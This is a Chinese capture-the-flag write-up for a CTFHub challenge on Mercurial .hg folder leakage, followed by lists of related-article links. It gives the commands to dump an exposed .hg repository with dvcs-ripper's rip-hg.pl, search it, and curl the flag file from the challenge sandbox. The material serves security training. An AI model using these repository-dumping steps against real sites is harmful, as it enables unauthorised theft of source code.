0x00 前言

CTFHub 专注网络安全、信息安全、白帽子技术的在线学习，实训平台。提供优质的赛事及学习服务，拥有完善的题目环境及配套 writeup ，降低 CTF 学习入门门槛，快速帮助选手成长，跟随主流比赛潮流。

0x01 题目描述

HG泄露：

当开发人员使用 Mercurial 进行版本控制，对站点自动部署。如果配置不当,可能会将.hg 文件夹直接部署到线上环境。这就引起了 hg 泄露漏洞。

Flag 在服务端旧版本的源代码中, 不太好使的情况下, 试着手工解决。

0x02 解题过程

这题与之前的题目比较类似，同样使用 dvcs-ripper 工具下载泄露的网站目录，但是使用工具过程中出现了一些错误，导致网站源代码没有完整下载。正如网页显示内容中的提示所说，不好使的情况下，试着手工解决。那么此题目是让我们不要过度依赖工具的使用。使用 tree 命令列出下载到本地目录的所有文件。发现一个可疑的文本文件，查看文本文件发现历史记录中一个新增的 flag 文件。正则搜索相关文件发现可疑文本，使用 curl 命令检查发现此题flag。

Ⅰ根据题目描述，在CTFHub上下载关于HG泄露的漏洞利用工具

https://github.com/kost/dvcs-ripper

Ⅱ终端打开工具所在目录

cd /home/kali/桌面/dvcs-ripper-master/dvcs-ripper-master

Ⅲ安装工具所需依赖库

apt-get install perl libio-socket-ssl-perl libdbd-sqlite3-perl libclass-dbi-perl libio-all-lwp-perl

Ⅳ使用dvcs-ripper下载泄露的文件发现提示404报错和两处完成，可能是没有完整下载网站目录

./rip-hg.pl -u http://challenge-137f105811083a40.sandbox.ctfhub.com:10800/.hg

Ⅴ使用tree命令列出刚刚下载的.hg网站目录，发现可疑的文本文件

tree .hg

Ⅵ查看可疑的文本文件是否存在此题flag，发现历史版本add flag

cat .hg/last-message.txt

Ⅶ发现历史版本可以使用正则表达式进行关键字查找

grep -a -r flag

Ⅷ使用curl命令检查一下data数据中的文本文件，发现此题flag

curl http://challenge-137f105811083a40.sandbox.ctfhub.com:10800/flag_1682217975.txt

0x03 HG泄露漏洞

Mercurial 是一种轻量级分布式版本控制系统，采用 Python 语言实现，易于学习和使用，扩展性强。其是基于 GNU General Public License (GPL) 授权的开源项目。

在 Mercurial 轻量级分布式版本控制系统中，本地既可以当做版本库的服务端，也可以当做版本库的客户端。版本库与工作目录不同，版本库存放了所有版本，而工作目录只是因为特定需要存放特定版本。与 SVN 系统不同，SVN 的版本库集中在一台服务器中。这也导致很多初次使用 Mercurial 系统的工作者，因为操作失误导致出现 HG 泄露漏洞的主要原因。

0x04 参考文献

[1].百度百科. Mercurial[EB/OL]. [2022-10-17]. https://baike.baidu.com/item/Mercurial/6615059.

0x05 总结

文章内容为学习记录的笔记，由于作者水平有限，文中若有错误与不足欢迎留言，便于及时更正。

CTFHub | HG泄露相关推荐

1. CTFHub HG泄露

   这题和之前的git和SVN同样的方法.这里用dirsearch扫出.hg,说明存在HG泄露. 然后用dvcs-ripper里的rip-hg.pl来获取.hg.不过这里工具并没有获得全部的文件.也是应了 ...

2. CTFHub信息泄露

   文章目录 phpinfo 备份文件下载 网站源码 bak文件 vim缓存 .DS_Store Git泄露 Log stash Index SVN泄露 HG泄露 phpinfo 直接Ctrl+f搜索fl ...

3. ctfhub Git泄露学习

   git泄露总结 CTFHUB之GIT泄露 Git常用命令及方法大全 - He_quotes - 博客园 GitHub - BugScanTeam/GitHack: .git 泄漏利用工具,可还原历史版 ...

4. CTFHUB技能树题目解析（持续更新）

   CTFHUB题目解析(持续更新) Web 信息泄露 目录遍历 PHPINFO 备份文件下载 网站源码 bak文件 vim缓存 .Ds_Store Git泄露 Log Stash Index SVN泄露 ...

5. CTFHub——Web技能树

   文章目录 信息泄露 目录遍历 PHPINFO 备份文件下载 Git泄露 SVN泄露 HG泄露 SQL注入 整型注入 字符型注入 报错注入 布尔盲注 时间盲注 MySQL结构 cookie注入 UA注入 ...

6. CTFHUB技能树（全详细解析含进阶）

   CTFHUB技能树 HTTP协议 请求树 302跳转 Cookie 基础认证 响应包源代码 信息泄露 目录遍历 phpinfo 备份文件下载 网站源码 bak文件 vim缓存 .DS_Store Gi ...

7. CTFHUB技能树之Web

   web web前置技能 参考链接 -操作系统 -数据库 -HTML/CSS -程序语言 HTTP协议 0x01 请求方式 1)HTTP Method 是可以自定义的,并且区分大小写 可以通过抓包更改其 ...

8. CTFHub-Web-信息泄露

   文章目录 目录遍历 PHPINFO 网站源码 bak文件 vim缓存 .DS_Store Git泄露-Log(环境有问题) Git泄露-Stash(环境有问题) Git泄露-Index SVN泄露 H ...

9. CTF信息搜集——敏感目录泄露

   文章参考:Nu1L战队所著<从0到1:CTFer成长之路> 目录 1 git泄露 1.1 常规git泄露 1.1.1 git介绍 1.1.2 git使用 1.1.3 泄露利用 1.2 gi ...

10. CTF Web方向考点总结

    CTF Web 0X00 前言 做题已经快四个月了,接触了大大小小的题型,收藏的大师傅们的解题思路.题型总结的博客已经很多了,每次都要一个一个翻很麻烦,于是写下了这一个总结,实际上是把各大博客内容汇总 ...

最新文章

1. lighttpd1.4.18代码分析
2. mysql 不让读的锁_MySQL实战45讲阅读笔记-锁
3. 深入解析Vue组件间通信
4. stick footers布局
5. mysql互为主从利弊_MySQL互为主从复制常见问题
6. sql2012服务器桌面图标,Windows Server 2012 修改桌面图标
7. ios字典存bool_iOS 开发之字典写入文件
8. C#将十进制转二进制
9. 火山PC-64位炫彩界面库调用试水-加载资源文件（UI教程）
10. 华为热设计工程师待遇_【华为热设计工程师面试】华为热设计工程师的笔试经历-看准网...
11. 智遥工作流是如何模拟并优化办公单据审批的
12. python读取txt文件中的数字_python从txt文件读取数据
13. 基于MATLAB的雷达的杂波模拟器
14. UR机器人(5)-使用变量
15. 手把手教你如何实现一个简单的数据加密算法
16. 若依前端分离框架-修改关于若依文字的网页标题
17. android NV21裁剪算法
18. oracle utl inaddr,oracle11gr2中ACL对UTL_INADDR的授权报错，急急急
19. 盘点系外行星中五大最有可能的宜居星球
20. 实操 | 合并VCF文件的几种方法及注意事项

热门文章

1. 2015农行软开笔试+面试小记
2. Java游戏编程——愤怒的小鸟（一）
3. DSP 6678的NETCP
4. IT书籍电子书下载网站
5. 勿让“天地图”成绿坝第二
6. 2021年危险化学品经营单位安全管理人员考试内容及危险化学品经营单位安全管理人员考试报名
7. hibernate历史版本下载
8. 搭建 Ruby 运行环境【Rails后端开发训练营】
9. linux1t文件误删,linux – 复制1TB稀疏文件
10. 什么是云？云里雾里——最流行的云时代